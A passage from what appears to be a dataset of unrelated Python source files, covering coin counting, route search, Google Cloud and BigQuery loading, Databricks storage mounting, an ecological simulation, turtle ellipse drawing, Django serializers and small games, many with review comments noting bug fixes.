        # Stop after the configured number of teacher episodes.
        if i_episode > args.num_teacher_episodes:
            break
    return policy_net
|
19,271 | 04e2fe2af58bb52427f2875d0d9f177c5f0dec96 | # -*- coding: utf-8 -*-
from __future__ import division
# NOTE(review): the original three input lines did not parse -- each prompt
# string was missing its closing quote and the keyword `in` was used where
# `int` was clearly intended.  Reconstructed as integer prompts; confirm the
# intended prompt text ('digite moedas' / 'cedulas') with the author.
a = int(input('digite moedas:'))  # value of the first coin
b = int(input('digite moedas:'))  # value of the second coin
c = int(input('cedulass:'))       # amount to break into coins
# NOTE(review): the original used `while c > 0:` but never modified c inside
# the loop, so it could never terminate; a single conditional pass preserves
# the apparent intent (print how many of each coin fit into the amount).
if c > 0:
    if c >= a:
        x = c // a            # how many coins of value a fit
        if c >= b:
            y = c // b        # how many coins of value b fit
            if c % x == 0:    # original condition kept verbatim
                print(x)
                print(y)
|
19,272 | 17a3dc06bf77b485764626a7e721848bc13f17e5 | # This function takes the path of the universe.db file
# and transforms it into a list which can be easily processed
def read_routes(path):
    """Load every route stored in the universe database.

    Parameters
    ----------
    path : str
        Path to an SQLite database file containing a ROUTES table.

    Returns
    -------
    list[tuple]
        One (ORIGIN, DESTINATION, TRAVEL_TIME) tuple per row.
    """
    import sqlite3
    from contextlib import closing
    # closing() guarantees the connection and cursor are released even when
    # the query raises -- the original leaked both on any exception.
    with closing(sqlite3.connect(path)) as connection:
        with closing(connection.cursor()) as cursor:
            cursor.execute("SELECT ORIGIN, DESTINATION, TRAVEL_TIME FROM ROUTES;")
            # fetchall() already returns a list of row tuples; the original's
            # element-by-element copy into a second list was redundant.
            return cursor.fetchall()
# This function reads the millenium-falcon.json file
# and returns the autonomy and the routes file as a list
def read_millenium_falcon(path):
    """Read the millennium-falcon JSON configuration.

    Parameters
    ----------
    path : str
        Path to a JSON file expected to contain the keys 'autonomy'
        (fuel range in days) and 'routes_db' (path to the routes SQLite
        database).

    Returns
    -------
    tuple
        (autonomy, routes) on success, or (0, []) when either required
        key is missing.
    """
    import json
    # Use a context manager so the file handle is closed -- the original
    # `json.load(open(path))` leaked it.
    with open(path) as f:
        millenium_falcon = json.load(f)
    if ('autonomy' not in millenium_falcon) or ('routes_db' not in millenium_falcon):
        return (0, [])
    autonomy = millenium_falcon['autonomy']
    routes = read_routes(millenium_falcon['routes_db'])
    return (autonomy, routes)
# The 3 following functions are used to compute all of the possible
# paths between Tatooine and Endor according to the universe.db file
# This first function creates an initial list of
# path between Tatooine and the reachable planet from Tatooine
# according to the routes list
def initialisation (routes):
    """Seed the search with one two-stop path per route leaving Tatooine.

    Each path is a list of (planet, day) tuples beginning with
    ('Tatooine', 0) followed by the directly reachable planet and its
    travel time.
    """
    return [[(origin, 0), (destination, travel_time)]
            for origin, destination, travel_time in routes
            if origin == 'Tatooine']
# This function returns True once all of the paths
# have been computed
def all_paths_bool(paths):
    """Return True once every path in *paths* ends at Endor.

    (The original kept an unused `counter` local; all() expresses the
    same short-circuiting check directly.)
    """
    return all(path[-1][0] == 'Endor' for path in paths)
# This function takes the list of route previously
# processed (from the universe.db file) and retourn
# all of the different paths as a list of list.
# Each list of the list is a path composed of tuples (str(Planet Name), int(day to reach it))
def create_all_paths(routes):
    """Enumerate every route chain from Tatooine to Endor.

    Breadth-first expansion of the paths seeded by initialisation();
    each returned path is a list of (planet_name, cumulative_days)
    tuples ending at Endor.

    NOTE(review): inherited from the original — a route graph with a
    cycle that never reaches Endor makes this loop forever.
    """
    finished = []
    frontier = initialisation(routes)
    while not all_paths_bool(frontier):
        expanded = []
        for path in frontier:
            current_planet, elapsed = path[-1]
            for origin, destination, travel_time in routes:
                if origin != current_planet:
                    continue
                candidate = path + [(destination, elapsed + travel_time)]
                if candidate[-1][0] == 'Endor':
                    finished.append(candidate)
                expanded.append(candidate)
        frontier = expanded
    return finished
# This function reads the empire-json.file
# and returns the countdown and the map of the hunters
def read_empire(path):
    """Read the empire.json file at *path*.

    Returns (countdown, hunters) where hunters is a list of
    (planet, day) tuples, or (0, []) when either required key is missing.
    """
    import json
    # BUG FIX: json.loads(open(path).read()) leaked the file handle.
    with open(path) as f:
        empire = json.load(f)
    if ('countdown' not in empire) or ('bounty_hunters' not in empire):
        return (0, [])
    countdown = empire['countdown']
    hunters = [(el['planet'], el['day']) for el in empire['bounty_hunters']]
    return (countdown, hunters)
19,273 | 790bed6d87505e3afdc004c48ec75815d8bac6fe | from collections import deque
# BUG FIX: the original named this list `list`, shadowing the builtin.
items = [1, 2, 3, 4, 5]
# Print the last element; negative indexing replaces items[len(items) - 1].
print(items[-1])
# Drop the first element. NOTE(review): list.pop(0) is O(n); the unused
# `deque` import above suggests deque.popleft() may have been intended.
items.pop(0)
print(items)
19,274 | 9cb2d424e37b9ffdfc1230a193649f72ef1eaaaa | from google.cloud import pubsub_v1
from google.cloud import storage
from google.cloud import bigquery
from google.auth.exceptions import DefaultCredentialsError
from google.api_core.exceptions import AlreadyExists
import time, csv, json
# Setup configurations
try:
    with open("config.json") as f:
        # BUG FIX: json.loads() no longer accepts an `encoding` argument
        # (deprecated in 3.1, removed in Python 3.9); json.load reads the
        # already-decoded text stream directly.
        config = json.load(f)
except Exception as e:
    raise Exception("Invalid configuration setup. Please validate if config.json is setup properly") from e
# Setup storage and pubsub clients
try:
    storage_client = storage.Client()
    subscriber = pubsub_v1.SubscriberClient()
    bq_client = bigquery.Client()
except DefaultCredentialsError as e:
    raise Exception("Invalid login credentials. Please make sure GOOGLE_APPLICATION_CREDENTIALS is setup") from e
# (The original `except Exception: raise e` clause was a no-op and has
# been removed — unhandled exceptions propagate unchanged.)
def callback(message):
    """Pub/Sub message handler: ack, then load the referenced CSV into BigQuery.

    message.data is a JSON object describing an uploaded blob (at least
    "bucket" and "name" keys are read downstream).
    """
    try:
        message.ack()
        # BUG FIX: parse the payload once (the original decoded the same
        # bytes twice) and drop the `encoding` kwarg, which json.loads no
        # longer accepts as of Python 3.9.
        bucket_info = json.loads(message.data)
        keys = read_file_contents(bucket_info)
        load_dataset_bq(bucket_info, keys)
    except KeyError as e:
        raise Exception("Please check the data published to pub_sub. One of the keys referenced does not exist") from e
    except Exception as e:
        print("Some error", type(e), e)
def load_dataset_bq(bucket_info, keys):
    """Create a BigQuery dataset named after the uploaded file and load it.

    bucket_info: dict with "bucket" and "name" of the GCS blob.
    keys: iterable of CSV column names; every column is loaded as STRING.
    """
    try:
        print(bucket_info)
        print(keys)
        uri = 'gs://{}/{}'.format(bucket_info.get("bucket"), bucket_info.get("name"))
        # Dataset/table id derived from the file name; dots are illegal in
        # BigQuery identifiers.
        dataset_id = bucket_info.get("name").replace(".", "_")
        dataset = bigquery.Dataset(bq_client.dataset(dataset_id))
        bq_client.create_dataset(dataset)
        print("dataset_id {}".format(dataset_id))
        dataset_ref = bq_client.dataset(dataset_id)
        print("uri is {}".format(uri))
        job_config = bigquery.LoadJobConfig()
        job_config.schema = [bigquery.SchemaField(items, "STRING") for items in keys]
        job_config.skip_leading_rows = 1
        job_config.source_format = bigquery.SourceFormat.CSV
        job_config.field_delimiter = ";"
        load_job = bq_client.load_table_from_uri(
            uri,
            dataset_ref.table(dataset_id),
            job_config=job_config
        )
        print('Starting job {}'.format(load_job.job_id))
        load_job.result()  # Waits for table load to complete.
        print('Job finished.')
        # BUG FIX: get_table() needs a table reference (or a fully
        # qualified id), not a bare dataset id string.
        destination_table = bq_client.get_table(dataset_ref.table(dataset_id))
        print('Loaded {} rows.'.format(destination_table.num_rows))
    except KeyError as ex:
        print("BQ : ", ex)
# Stream the contents of the csv file to pubsub for example
def read_file_contents(bucket_info):
    """Return the CSV header (column names) of the blob described by bucket_info.

    Returns None (after printing the error) when the blob is missing,
    not a CSV, or cannot be parsed.
    """
    try:
        print(bucket_info)
        bucket = storage_client.get_bucket(bucket_info.get("bucket"))
        blob = bucket.get_blob(bucket_info.get("name"))
        if blob is None or blob.content_type != "text/csv":
            raise Exception("Invalid file type. We only support csv files")
        lines = blob.download_as_string().decode().split("\n")
        reader = csv.DictReader(lines, delimiter=";")
        # BUG FIX: the original iterated the whole file just to return the
        # first row's keys (and returned None for header-only files);
        # DictReader.fieldnames is exactly the parsed header row.
        return reader.fieldnames
    except Exception as e:
        print("Error parsing the file", e)
        print(e.args)
def subscribe_to_source_topic():
    """Create the configured Pub/Sub subscription, attach `callback`, and block.

    Reads PROJECT_ID, SOURCE_TOPIC and SOURCE_TOPIC_SUBSCRIBER from the
    module-level `config`; sleeps forever so the subscriber thread keeps
    receiving messages.
    """
    # Create the subscription
    try:
        project_id = config.get("PROJECT_ID")
        source_topic = config.get("SOURCE_TOPIC")
        topic_subscriber = config.get("SOURCE_TOPIC_SUBSCRIBER")
        if project_id and source_topic and topic_subscriber:
            topic = subscriber.topic_path(project_id, source_topic)
            path = subscriber.subscription_path(project_id, topic_subscriber)
            subscriber.create_subscription(path, topic)
        else:
            # Not caught below, so a missing property aborts the whole call.
            raise Exception("Configuration properties not set")
    except KeyError:
        print("Invalid configuration keys")
        raise Exception("Trying to access wrong key from configuration. Please check your configuration access")
    except KeyboardInterrupt as e:
        # NOTE(review): if the interrupt lands before `path` is assigned,
        # the subscribe() call below raises NameError — confirm intent.
        print("Manual Interruption")
    except AlreadyExists as e:
        # Reusing an existing subscription is fine; fall through and listen.
        print("You are trying to create an existing subscription. Please change the name for your subscriber")
    subscriber.subscribe(path, callback=callback)
    print('Listening for messages on {}'.format(path))
    # Keep the main thread alive; messages are handled on subscriber threads.
    while True:
        time.sleep(10)
# Module entry point: start listening as soon as the script is imported/run.
subscribe_to_source_topic()
|
19,275 | 999db0bb9e2b84b0d0775202cf8fc4e4a96afdbb | import cv2
# Load an image, zero its blue channel so only green and red remain
# (producing a yellow-tinted picture), then display and save the result.
fname = '/home/yuto/Documents/AIhub/download.jpeg'
original = cv2.imread(fname, cv2.IMREAD_COLOR)
# (Removed an unused `b, g, r = cv2.split(original)` — its results were
# never read.)
original[:, :, 0] = 0  # channel 0 is blue in OpenCV's BGR layout
cv2.imshow('Image', original)
cv2.imwrite('file3.png', original)
cv2.waitKey(0)
cv2.destroyAllWindows()
19,276 | 9e21fd60fecdb4e57a3f8c5f8397746a73646a09 | #!/usr/bin/env python3
__appname__ = '[assembly.py]'
__author__ = 'Pablo Lechon (plechon@ucm.es)'
__version__ = '0.0.1'
## IMPORTS ##
import sys
from model import *
import itertools
from functions import *
import pandas as pd
import progressbar
## CONSTANTS ##
global seed; seed = 69
## FUNCTIONS ##
def main(argv):
    '''Run the community-assembly simulations over an N-D parameter grid.

    For every combination of (beta, kc, kf, Kc, Kf, l, n_sim) this samples
    preference and metabolic matrices, integrates the community dynamics to
    steady state with solve_ivp, records competition/facilitation metrics
    before and after assembly, and writes results plus sampled matrices to
    csv files under ../data/.

    NOTE(review): reads sys.argv directly rather than the *argv* parameter.
    '''
    # Environment with s strains and m metabolites
    m = 60
    s = 60
    # Partition families
    n_fam = 4
    n_memb = 15
    # Create a dictionary of parameters
    params = {'g': np.ones(s).reshape(s, 1),
              's': s,
              'm': m,
              'K': 20*np.ones(m).reshape(m, 1),
              't': 0.5*np.ones(m).reshape(m, 1),
              'coal': 0  # This is not a coalescence event
              }
    # Create time vector
    tspan = tuple([1, 1e4])
    # Set initial conditions
    z0 = list(np.ones(s)) + list(2*np.ones(m))
    # Create parameter vectors (removed the unused `nr` vector)
    beta = np.linspace(5, 5, num = 1, dtype = int)
    kc = np.linspace(0, 0.9, num = 3)
    kf = np.linspace(0.01, 0.99, num = 3)
    Kc = np.linspace(0.1, 0.9, num = 3)
    Kf = np.linspace(0.1, 0.9, num = 3)
    l = np.array([0.2, 0.5, 0.9])
    nsim = range(2)
    # Create N-D parameter grid
    product = itertools.product(beta, kc, kf, Kc, Kf, l, nsim)
    # Create column names of data frame
    col_names = ['beta', 'kc', 'kf', 'Kc', 'Kf', 'l', 'n_sim']
    # Create dataframe for storing parameter values and simulation results
    df = pd.DataFrame(data = np.array(list(product)), columns = col_names)
    # Preallocate columns for C0 and F0 calculations (pre-assembly metrics)
    ncol = len(df)
    df['C0'] = np.zeros(ncol)
    df['F0'] = np.zeros(ncol)
    df['C0tot'] = np.zeros(ncol)
    df['C0av'] = np.zeros(ncol)
    df['C0bav'] = np.zeros(ncol)
    df['C0b1av'] = np.zeros(ncol)
    df['F0tot'] = np.zeros(ncol)
    df['F0av'] = np.zeros(ncol)
    # Preallocate columns for C and F calculations (after community assembly)
    df['C'] = np.zeros(ncol)
    df['F'] = np.zeros(ncol)
    df['Ctot'] = np.zeros(ncol)
    df['Cav'] = np.zeros(ncol)
    df['Cbav'] = np.zeros(ncol)
    df['Cb1av'] = np.zeros(ncol)
    df['Ftot'] = np.zeros(ncol)
    df['Fav'] = np.zeros(ncol)
    # Preallocate column for richness
    df['r'] = np.zeros(ncol, dtype = int)
    # Preallocate harvest factors
    df['B'] = np.zeros(ncol)
    df['Fin'] = np.zeros(ncol)
    # Preallocate average abundance and average pathway number vectors
    df['av_ab'] = np.zeros(ncol)
    df['av_path'] = np.zeros(ncol)
    df['std_dem'] = np.zeros(ncol)
    # Preallocate frames for preference and metabolic matrices.
    # Note the extra column on all_c flagging whether each species is
    # extinct (-1) or extant (1) after assembly.
    all_c = pd.DataFrame(data = np.zeros(shape = (s*ncol, m + 1), dtype = int))
    all_D = pd.DataFrame(data = np.zeros(shape = (m*ncol, m)))
    all_abundances = pd.DataFrame(data = np.zeros(shape = (ncol, s)))
    # Set indices to number each community
    all_c = all_c.set_index(np.repeat(np.arange(ncol), s))
    all_D = all_D.set_index(np.repeat(np.arange(ncol), m))
    # Run simulations across the parameter grid
    for i in progressbar.progressbar(range(ncol)):
        # Create vector of species classes
        sc_vec = np.repeat(np.arange(n_fam), n_memb)
        # Draw preference matrix
        c = gen_pref_matrix(0, df['kc'][i], m, n_memb, sc_vec, sc_vec)
        # Compute demands as the sum of the rows of c
        demands = np.sum(c, axis = 0)
        # Sample metabolic matrix.
        # NOTE(review): Dant is never used below, but the call is kept in
        # case crossfeeding_matrix advances shared RNG state — confirm
        # before removing it.
        Dant = crossfeeding_matrix(demands, m, df['kf'][i])
        # Get matrix of classes
        Mc = class_matrix(m, n_fam)
        D = metabolic_matrix(kf = df['kf'][i], s = 0.05, M = Mc, Mc = n_memb,
                             m = m)
        # Store in dataframe
        all_D[m*i:m*(i+1)] = D
        # Compute costs
        maint_vec = maintenance(c)
        # Calculate facilitation/competition cycling (pre-assembly)
        F_cy = community_facilitation(c, c, D, df['l'][i], df['l'][i])
        C_cy = community_competition(c, c, D, df['l'][i], df['l'][i])
        # Calculate competition and facilitation matrices of the community
        # before the assembly
        C = interaction_matrix(df['l'][i], c, D,
                               interaction = 'competition')
        F = interaction_matrix(df['l'][i], c, D,
                               interaction = 'facilitation')
        # Average non-zero elements to get community level facilitation and
        # competition, leaving out the 0 of the diagonal
        df.loc[i, 'C0'] = np.sum(C)/(np.size(C)-len(np.diag(C)))
        df.loc[i, 'F0'] = np.sum(F)/(np.size(F)-len(np.diag(F)))
        df.loc[i, 'F0tot'] = F_cy[0]
        df.loc[i, 'C0tot'] = C_cy[0]
        df.loc[i, 'F0av'] = F_cy[1]
        df.loc[i, 'C0av'] = C_cy[1]
        df.loc[i, 'C0bav'] = C_cy[2]
        # Add sampled strategies, metabolic matrix, costs, and leakage
        # to the parameter dictionary (the original recomputed maint_vec
        # here; the value from above is identical)
        params['D'] = D
        params['c'] = c
        params['x'] = maint_vec.reshape(s, 1)
        params['l'] = df['l'][i]*np.ones(m).reshape(m, 1)
        # Solve diferential equations
        sol = solve_ivp(lambda t, z: equations(t, z, params),
                        tspan, z0,
                        method = 'BDF', atol = 0.0001)
        # Get abundance of species at stable state
        stable_abundance = sol.y[0:s, -1]
        # Store in dataframe
        all_abundances.iloc[i] = stable_abundance
        # Get indices of extant species (abundance above 1)
        ind_extant = np.where(stable_abundance > 1)[0]
        # Create a vector of extant species: -1 extinct, 1 extant
        extant = -1*np.ones(shape = (s, 1))
        extant[ind_extant] = 1
        c_tot = np.hstack([c, extant])
        # Store in data frame
        all_c[s*i:s*(i+1)] = c_tot
        # Get average abundance of extant species
        av_abundance = np.mean(stable_abundance[ind_extant])
        # Store average abundance
        df.loc[i, 'av_ab'] = av_abundance
        # Store community richness
        df.loc[i, 'r'] = len(ind_extant)
        # Keep only extant rows of the matrix of preferences
        c_assembly = c[ind_extant, :]
        # Get average number of pathways in the community
        av_pathways = np.mean(np.sum(c_assembly, axis = 1))
        # Store
        df.loc[i, 'av_path'] = av_pathways
        # Get total demand of each resource after assembly
        demands = np.sum(c_assembly, axis = 0)
        # Store its standard deviation
        df.loc[i, 'std_dem'] = np.std(demands)
        # Calculate average terms of the effective harvest
        B = potential_harvest(df['l'][i], c_assembly, demands)
        Fplus = facilitation_in(df['l'][i], c_assembly, None, D, demands)
        # Store in data frame
        df.loc[i, 'B'] = B
        df.loc[i, 'Fin'] = Fplus
        # Recalculate facilitation and competititon community-level indices
        F = interaction_matrix(df['l'][i], c_assembly, D,
                               interaction = 'facilitation')
        C = interaction_matrix(df['l'][i], c_assembly, D,
                               interaction = 'competition')
        # Recalculate facilitation/competition cycling
        F_cy = community_facilitation(c_assembly, c_assembly, D,
                                      df['l'][i], df['l'][i])
        C_cy = community_competition(c_assembly, c_assembly, D,
                                     df['l'][i], df['l'][i])
        # Average non-zero elements to get community level facilitation and
        # competition, leaving out the 0 of the diagonal
        df.loc[i, 'C'] = np.sum(C)/(np.size(C)-len(np.diag(C)))
        df.loc[i, 'F'] = np.sum(F)/(np.size(F)-len(np.diag(F)))
        df.loc[i, 'Ftot'] = F_cy[0]
        df.loc[i, 'Ctot'] = C_cy[0]
        # BUG FIX: 'Fav' previously stored F_cy[0], duplicating 'Ftot';
        # store the average term to mirror 'F0av' = F_cy[1] above.
        df.loc[i, 'Fav'] = F_cy[1]
        df.loc[i, 'Cav'] = C_cy[1]
        df.loc[i, 'Cbav'] = C_cy[2]
        # (Removed a leftover `import ipdb; ipdb.set_trace()` debug trap
        # that halted every run with l == 0.9.)
    # Save results, tagging file names with the optional CLI suffix
    if len(sys.argv) > 1:
        df.to_csv('../data/simulation_results_'+sys.argv[1]+'.csv',
                  index = False)
        all_c.to_csv('../data/c_matrices_'+sys.argv[1]+'.csv')
        all_D.to_csv('../data/D_matrices_'+sys.argv[1]+'.csv')
        all_abundances.to_csv('../data/abundances_'+sys.argv[1]+'.csv')
    else:
        df.to_csv('../data/simulation_results.csv', index = False)
        all_c.to_csv('../data/c_matrices.csv')
        all_D.to_csv('../data/D_matrices.csv')
        all_abundances.to_csv('../data/abundances.csv')
    return 0
## CODE ##
# Script entry point: forward argv to main() and propagate its exit status.
if (__name__ == '__main__'):
    status = main(sys.argv)
    sys.exit(status)
|
19,277 | 006b4d9e27960133df60a52ed319d322bf0289ef | import turtle
from math import sqrt
def drawpixel(x, y):
    """Plot a single 3-pixel dot at (x, y) without drawing a connecting line."""
    turtle.up()
    turtle.goto(x, y)
    turtle.dot(3)
def ellipse(a, b):
    """Draw an origin-centred ellipse with the midpoint rasterisation algorithm.

    a, b: semi-major (x) and semi-minor (y) axis lengths in pixels.
    Plots four symmetric points per step via drawpixel().
    """
    x = 0
    y = b
    # Region 1 decision variable: d1 = b^2 + a^2 * (1/4 - b)
    d1 = b * b + a * a * (0.25 - b)
    drawpixel(x, y)
    drawpixel(-x, y)
    drawpixel(-x, -y)
    drawpixel(x, -y)
    # Region 1: |slope| < 1, so x advances every step.
    while (b * b * (x + 1) < a * a * (y - 0.5)):
        if d1 < 0:
            d1 += b * b * (2 * x + 3)
            x += 1
        else:
            d1 += b * b * (2 * x + 3) + a * a * (3 - 2 * y)
            x += 1
            y -= 1
        drawpixel(x, y)
        drawpixel(-x, y)
        drawpixel(-x, -y)
        drawpixel(x, -y)
    # BUG FIX: the region-2 decision variable uses SQUARED terms,
    # d2 = b^2*(x+1/2)^2 + a^2*(y-1)^2 - a^2*b^2; the original took
    # square roots of each term, which is not the midpoint test.
    d2 = b * b * (x + 0.5) ** 2 + a * a * (y - 1) ** 2 - a * a * b * b
    # Region 2: |slope| > 1, so y decreases every step.
    while y > 0:
        if d2 < 0:
            d2 += b * b * (2 * x + 2) + a * a * (-2 * y + 3)
            x += 1
            y -= 1
        else:
            d2 += a * a * (3 - 2 * y)
            y -= 1
        drawpixel(x, y)
        drawpixel(-x, y)
        drawpixel(-x, -y)
        drawpixel(x, -y)
def main():
    """Prompt for the two semi-axes and draw the ellipse with turtle graphics."""
    a = int(input('请输入椭圆的长半径a:'))
    b = int(input('请输入椭圆的短半径b:'))
    turtle.pencolor('red')
    turtle.hideturtle()
    turtle.speed(0)  # 0 = fastest drawing speed
    turtle.screensize(800, 600, 'white')
    ellipse(a, b)
    # Keep the window open until the user closes it.
    turtle.mainloop()
if __name__ == "__main__":
    main()
19,278 | 367600f8cdeede4e29bf340d2ff5862d0b6f9f1b | # Databricks notebook source
# MAGIC %md Azure Databricks notebooks by Rene Bremer
# MAGIC
# MAGIC Copyright (c) Microsoft Corporation. All rights reserved.
# MAGIC
# MAGIC Licensed under the MIT License.
# COMMAND ----------
import os
# Notebook widgets supply the storage account and container to mount.
par_stor_name = dbutils.widgets.get("stor_name")
par_container_name = dbutils.widgets.get("container_name")
#par_private_link_dns = dbutils.widgets.get("private_link_dns")
# Exported so the %sh cell below can reference $container.
os.environ['container'] = par_container_name
# COMMAND ----------
import socket
# Resolve the ADLS Gen2 endpoint (useful to verify private-link DNS).
addr = socket.gethostbyname(par_stor_name + '.dfs.core.windows.net')
print(addr)
# COMMAND ----------
# Databricks notebook source
# "fs.azure.account.oauth2.client.secret": dbutils.secrets.get(scope="<scope-name>",key="<service-credential-key-name>"),
# OAuth client-credentials config for the service principal stored in the
# "dbrkeys" secret scope.
configs = {"fs.azure.account.auth.type": "OAuth",
           "fs.azure.account.oauth.provider.type": "org.apache.hadoop.fs.azurebfs.oauth2.ClientCredsTokenProvider",
           "fs.azure.account.oauth2.client.id": dbutils.secrets.get(scope="dbrkeys",key="spn-id"),
           "fs.azure.account.oauth2.client.secret": dbutils.secrets.get(scope="dbrkeys",key="spn-key"),
           "fs.azure.account.oauth2.client.endpoint": "https://login.microsoftonline.com/" + dbutils.secrets.get(scope="dbrkeys",key="tenant-id") + "/oauth2/token"}
# Optionally, you can add <directory-name> to the source URI of your mount point.
dbutils.fs.mount(
    source = "abfss://" + par_container_name +"@" + par_stor_name + ".dfs.core.windows.net/",
    mount_point = "/mnt/" + par_container_name,
    extra_configs = configs)
# COMMAND ----------
%sh
ls -l /dbfs/mnt/$container
# COMMAND ---------- |
19,279 | 2747f9fe5745ad1b30eba651aa20f0db8b586626 | from e47_circle import Circle
import pytest
@pytest.mark.parametrize('iterable, maxtimes, output', [
    ('abcd', 7, 'abcdabc'),
    ([10, 20, 30], 2, [10, 20]),
    ([10, 20, 30], 8, [10, 20, 30, 10, 20, 30, 10, 20]),
])
def test_circle(iterable, maxtimes, output):
    """Circle must cycle through *iterable* and stop after *maxtimes* items."""
    assert list(Circle(iterable, maxtimes)) == list(output)
19,280 | f063f9f75dc795c17cae972d3fda097a36b3068e | from concurrent.futures.thread import ThreadPoolExecutor
from google.protobuf.empty_pb2 import Empty
import grpc
from shared_code.my_lib import start_insecure
from stubbed_code.shared_class import SharedClass
# pyright: reportUnknownMemberType = false
server = grpc.server(ThreadPoolExecutor(), handlers=None)
class OverrideClass2(SharedClass):
    """SharedClass variant whose GetStatus is stubbed out (body elided with ...)."""
    def GetStatus(self,
        request: Empty,
        context: grpc.ServicerContext,
    ) -> int: ...
    # do even more special stuff
# Bind the server to an insecure local port and start serving.
start_insecure("localhost:8080",server )
19,281 | 43a4ea94295fcb8024bb27ec23f5dc510b6c320e | from django.contrib.auth.models import User
from rest_framework import serializers
class OwnerSerializer(serializers.ModelSerializer):
    """Serialise a Django User as its id, username and email."""
    class Meta:
        fields = (
            'id',
            'username',
            'email',
        )
        model = User
class EntrySerializer(serializers.Serializer):
    """Aggregate view over a user's entries queryset.

    Fields:
        count        -- number of entries.
        lastModified -- most recent `modified_date`, or None when empty.
    """
    count = serializers.SerializerMethodField()
    lastModified = serializers.SerializerMethodField()

    def get_count(self, obj):
        # obj is the related entries queryset (source="entries" upstream).
        return obj.count()

    def get_lastModified(self, obj):
        # .first() on the ordered queryset fetches one row; the original
        # len(entries) forced the whole queryset to be evaluated.
        latest = obj.order_by('-modified_date').first()
        return latest.modified_date if latest is not None else None
class UserSerializer(serializers.ModelSerializer):
    """User plus aggregate info about their entries.

    `entry` serialises the user's related `entries` queryset through
    EntrySerializer; `reminder` is read straight from the model.
    """
    entry = EntrySerializer(read_only=True, source="entries")
    reminder = serializers.ReadOnlyField()
    class Meta:
        model = User
        fields = ('id', 'username', 'entry', 'reminder')
|
19,282 | d5e628ac2bf735f16fed2abacb3fb93d90bf99ba | from day16_menu import Menu, MenuItem
from day16_coffee_maker import CoffeeMaker
from day16_money_machine import MoneyMachine
def main():
    """Interactive coffee-machine loop: take orders until switched off."""
    menu = Menu()
    maker = CoffeeMaker()
    money_machine = MoneyMachine()
    while True:
        order = input(f" What would you like? ({menu.get_items()}):")
        if order == 'report':
            # Maintenance command: dump resource and cash levels.
            maker.report()
            money_machine.report()
        elif order == 'off':
            exit()
        elif menu.find_drink(order):
            drink = menu.find_drink(order)
            enough_resources = maker.is_resource_sufficient(drink)
            # Payment is only attempted once resources are confirmed.
            if enough_resources and money_machine.make_payment(drink.cost):
                maker.make_coffee(drink)
if __name__ == "__main__":
    main()
|
19,283 | c59562788b4f0876bfa61bf52572f1551e289431 | #!/usr/bin/env python
# This is a Python script that implements the first stage of classification: junction detection.
# Input:
# data: list of tuples with the first element in each tuple as an angle and the second a distance
# radians: boolean that indicates whether the input data is in radians
import math
import random
def alg_stage1(data, radians):
    """First-stage junction detection from a laser range scan.

    data:    list of (angle, distance) tuples sweeping right to left.
    radians: True when angles are already in radians (degrees otherwise).

    Returns [left_junction, right_junction] booleans. The scan is compared
    against the straight-pipe model implied by the first and last samples;
    a large enough deviation away from the vertical flags that side.
    Note: when *radians* is False, *data* is converted in place (matching
    the original contract).
    """
    n = len(data)
    # Normalise every angle to radians, mutating the caller's list.
    if not radians:
        for i in range(n):
            angle, dist = data[i]
            data[i] = (angle * math.pi / 180.0, dist)
    # Horizontal wall distances from the first (right) and last (left) samples.
    r_left = abs(data[n - 1][1] * math.cos(data[n - 1][0]))
    r_right = abs(data[0][1] * math.cos(data[0][0]))
    # Tolerance scales with the angular step and both wall distances.
    step = data[1][0] - data[0][0]
    tol = step * (r_left + r_right)
    junction = [False, False]
    for angle, dist in data:
        on_right = angle < math.pi / 2
        # Expected range for a straight pipe on this side.
        if on_right:
            expected = r_right / math.cos(angle)
        else:
            expected = r_left / math.cos(math.pi - angle)
        diff = abs(dist - abs(expected))
        # Only deviations on the sides matter; ignore a 10-degree band
        # around the vertical.
        if diff > tol and abs(angle - math.pi / 2) > 10 * math.pi / 180:
            if on_right:
                junction[1] = True
            else:
                junction[0] = True
    return junction
|
19,284 | eaa9109b8e691104f67eb563ba12130bd185ce9a | from t2imageObject import imageObject
from t2tools import Console
class AutoImage(imageObject):
    """imageObject specialisation that manages the score on its own.

    The sprite falls automatically; falling off the bottom deducts points
    and a matching key press awards points (see imgEventClick).
    """
    # This class specialises imageObject to control scoring autonomously.
    def __init__(self, env, name, src=None, objects=None, png=False):
        # env:  shared game-state dict (reads 'screenHeight', mutates 'score')
        # name: key name used to judge whether a press matches this sprite
        super(AutoImage, self).__init__(src, objects, png)
        self.env = env
        self.downspeed = 1000  # move down one step every `downspeed` ms
        self.downdeltatime=0  # accumulated elapsed time since the last step
        self.name=name  # the array judges click correctness against this
        self.flag=True  # True = not yet due for destruction; set False once the sprite reaches the bottom
        # self.isControl=False  # when False, drawDown is unaffected
        # self.
    # This is essentially a visual effect, but it also carries the
    # deduct-points-on-reaching-the-bottom behaviour.
    def drawDown(self, deltatime,screen):
        self.downdeltatime+=deltatime
        # if self.isAlphain==False:
        #     self.alphain(deltatime)
        # print(self.name)
        if self.downdeltatime*1000>self.downspeed and self.isExplodeStart==False:
            if self.y>=self.env['screenHeight']:
                self.flag=False
                # Fell out of the world: deduct 100 points
                self.env['score']-=100
            else:
                self.transY(60)
            self.downdeltatime=0
        self.draw(screen)
        if self.y>400:
            self.flashme(200,deltatime)
        self.explode(deltatime)
    # This method needs cooperation from the scene: place outImage's event
    # handler below the event loop. outImage searches the stack back to
    # front; if the pressed key matches an image it is removed and points
    # are added, otherwise points are deducted.
    # On removal this function runs — put any click effects here.
    def imgEventClick(self,event):
        if event.key==Console.getkeyCode(self.name):
            self.env['score']+=100
            self.isExplodeStart=True
            # print('got in!!!!!')
            return True
        else:
            return False
|
19,285 | 0507cf3399549b5c91b3dd7501b145ac70c150b7 | from django.contrib import admin
from Userreg.models import UserProfileInfo,User,Event
# Register your models here.
admin.site.register(UserProfileInfo)
# NOTE(review): User and Event are imported above but never registered —
# confirm whether they should also be exposed in the admin site.
19,286 | 6adcd3b87ab58454fc9eed6cc5842a76091e0fab | # -*- coding: utf-8 -*-
import pandas as pd
import jieba
from sklearn import feature_extraction
from sklearn.feature_extraction.text import TfidfVectorizer
from gensim import corpora, models
import gensim
from nltk.tokenize import RegexpTokenizer
from itertools import compress
import datetime
import glob, os
import csv
import json
import datetime
from utils import notification
# Convert scraped PTT posts (JSON files) into one CSV of news articles,
# segmenting the content with jieba. Python 2 syntax throughout.
tmp_all=[]
# NOTE(review): the header declares 5 columns but each row below appends
# only 4 values (title, date, url, content_split) — 'n_hate' is never
# filled, so the CSV columns are misaligned. Confirm the intended source
# of 'n_hate'.
tmp_all.append(['title','date','url','n_hate','content_split'])
